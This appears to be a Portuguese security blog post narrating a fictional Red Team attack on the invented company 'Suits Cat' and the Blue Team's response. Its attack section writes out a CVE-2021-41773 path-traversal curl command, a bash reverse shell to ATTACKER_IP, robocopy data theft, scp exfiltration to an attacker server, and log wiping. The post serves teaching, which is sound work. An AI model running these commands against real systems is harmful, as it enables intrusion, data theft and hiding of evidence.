Capa da publicação

🕒 Tempo estimado de leitura:

No mundo da segurança da informação, existe um duelo silencioso que acontece todos os dias. De um lado, o Red Team — profissionais que simulam ataques cibernéticos. Do outro, o Blue Team — responsáveis por defender e proteger os sistemas.

Essas simulações não são apenas "joguinhos" entre hackers éticos e analistas de segurança. Elas são fundamentais para testar, corrigir e fortalecer a segurança de uma organização antes que um invasor de verdade tente algo.

O que é Red Team?

O Red Team é como se fosse o “lado do mal” – só que do bem. São especialistas que pensam e agem como hackers para encontrar falhas em sistemas, redes, servidores e aplicações. Eles tentam invadir a infraestrutura da empresa sem causar danos reais, apenas para mostrar onde estão os pontos fracos.

O que é Blue Team?

O Blue Team é o “escudo”. São os defensores que analisam, monitoram e reagem aos ataques. Eles usam ferramentas como SIEM, antivírus, firewalls, e logs para detectar e responder rapidamente a qualquer comportamento suspeito.

Simulação  de Ataque

Sobre a Suits Cats

A Suits Cats é uma empresa de design de roupas sob demanda, que atua com forte presença digital. Sua infraestrutura de TI é híbrida (parte local, parte em nuvem), e os sistemas críticos são:

  • Servidor de Arquivos (Windows Server 2019) – onde ficam os modelos de roupas, documentos financeiros e contratos.

  • Servidor Web (Ubuntu 22.04 + Apache) – site institucional e área de login de clientes.

  • Servidor de Autenticação (Active Directory) – gerenciamento de usuários internos.

  • Estação de Trabalho de um Designer – Windows 10, com acesso a dados sensíveis e credenciais salvas em navegador.

  • Firewall Perimetral FortiGate – controla o tráfego entre internet e rede interna.

Red Team em ação: Etapas do Ataque

1. Reconhecimento externo (passivo e ativo)

Objetivo:

Descobrir o que está exposto na internet e coletar informações públicas da Suits Cat.

Técnicas usadas:

  • whois, nslookup, Google Dorking

  • Shodan para procurar IPs públicos da empresa

  • Nmap para escanear as portas abertas

Descoberta:

  • IP do site principal: 201.88.45.120

  • Apache 2.4.49 em execução (com histórico de vulnerabilidade)

  • Página de login /painel usando autenticação por cookie

  • Subdomínio oculto: intranet.suitscat.com

Exploiting do servidor Web (Apache)

O Red Team identificou que o Apache não estava atualizado. Utilizando a vulnerabilidade CVE-2021-41773 (path traversal), conseguiram explorar o sistema para acessar arquivos internos do servidor.

Comando real usado:

curl http://201.88.45.120/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd

Resultado: acesso ao conteúdo do arquivo /etc/passwd.

Em seguida:

Subiram um web shell disfarçado em um arquivo .php, para obter controle remoto do servidor.

Acesso remoto e persistência

Com o shell no ar, usaram um payload reverso via netcat:

nc -lvnp 4444

No servidor web:

bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1

Agora o Red Team tem acesso completo ao servidor web.

Descoberta de credenciais e movimentação lateral

No servidor web, encontraram um arquivo .env com credenciais salvas:

DB_USER=admin
DB_PASS=suitsp@ss123

Usaram essas credenciais para acessar o banco de dados interno e encontraram um campo com credenciais de usuários internos, armazenadas sem criptografia. Entre elas:

[email protected] : Joana123!

Usaram essas credenciais no Active Directory da empresa e conseguiram login com sucesso. A Joana tinha acesso administrativo a pastas de rede.

Ataque ao Servidor de Arquivos

Com acesso via VPN (simulando o acesso da Joana), o Red Team mapeou a rede:

net view \\fileserver01

Acessaram a pasta \\fileserver01\Financeiro e encontraram:

  • Planilhas de pagamento de fornecedores

  • Relatórios mensais com valores de produção

  • Cópias de contratos com estilistas parceiros

Fizeram download silencioso com robocopy:

robocopy \\fileserver01\Financeiro C:\Temp\loot\ /E

6. Exfiltração de dados

Compactaram os arquivos e enviaram para um servidor externo:

tar -czvf financeiro.tar.gz *
scp financeiro.tar.gz [email protected]:/home/attacker/

7. Cobertura de rastros

  • Deletaram logs do Apache

  • Deletaram histórico de shell

  • Alteraram o timestamp de arquivos acessados

Blue Team responde

1. Primeiros sinais

O time de defesa da Suits Cat recebeu um alerta do SIEM (Graylog) indicando:

  • Acesso incomum ao servidor web

  • Tentativas de leitura de arquivos sensíveis (/etc/passwd)

  • Atividade fora do horário (03h15 da manhã)

Ação imediata

  • Isolaram o servidor web da rede

  • Revogaram as credenciais da Joana

  • Desconectaram a VPN forçada usada no ataque

Investigação

  • Analisaram logs e encontraram uso da vulnerabilidade CVE-2021-41773

  • Identificaram exfiltração de 1,3 GB de dados do servidor de arquivos

  • Verificaram que o firewall não bloqueou o tráfego de saída no protocolo SCP

Correções e melhorias

  • Atualizaram Apache para a versão mais recente

  • Habilitaram WAF (Web Application Firewall)

  • Bloquearam portas de saída desnecessárias

  • Adicionaram 2FA no Active Directory

  • Criaram políticas de DLP (Data Loss Prevention)

Resumo da simulação

Etapa Red Team Blue Team
Reconhecimento Encontrou subdomínio e falha no Apache Não detectado
Exploração Upload de shell Detectado por SIEM tardiamente
Movimentação lateral Uso de credenciais encontradas Credenciais revogadas após invasão
Acesso a arquivos Robocopy dos dados financeiros Logs mostraram movimentação incomum
Exfiltração Dados enviados para servidor externo Tráfego não bloqueado pelo firewall
Resposta - Isolamento, análise, correção

Resumo

Esse artigo é meio doido, mas é baseado em uma simulação realista de como uma empresa pode ser invadida – no caso, a nossa fictícia Suits Cat. A ideia foi mostrar, passo a passo, como um time vermelho (Red Team) simula um ataque de verdade: começando pelo reconhecimento, passando pela exploração de vulnerabilidade em servidor Apache, escalando privilégios, invadindo a rede interna, roubando dados, e ainda limpando os rastros.

Ao mesmo tempo, mostramos como o time azul (Blue Team) pode detectar, reagir e se recuperar desse tipo de invasão — tudo com linguagem mais acessível, mas sem perder a parte técnica.

Essa simulação mostra que:

  • Uma falha pequena (tipo um servidor desatualizado) pode abrir uma brecha gigante.

  • Segurança não é só antivírus e firewall — envolve monitoramento, resposta rápida e boas práticas.

  • O Red Team pensa como atacante, mas ajuda a fortalecer o sistema.

  • O Blue Team precisa estar preparado pra correr atrás do prejuízo e prevenir novas brechas.

No fim das contas, o que rolou aqui foi uma aula prática (com emoção) sobre segurança ofensiva e defensiva.

E se sua empresa ainda não faz esse tipo de simulação... tá vacilando.

Publicado em 30/03/2025 17:09

Mais Publicações

Capa da publicação

Oracle Cloud Comprometida em 2025: Entenda a Vulnerabilidade

Ver Publicação
Capa da publicação

Segredos nos logs: falha no Windows expõe arquivos sensíveis

Ver Publicação
Capa da publicação

O que é e como enfrentar o Rogue DHCP Attack

Ver Publicação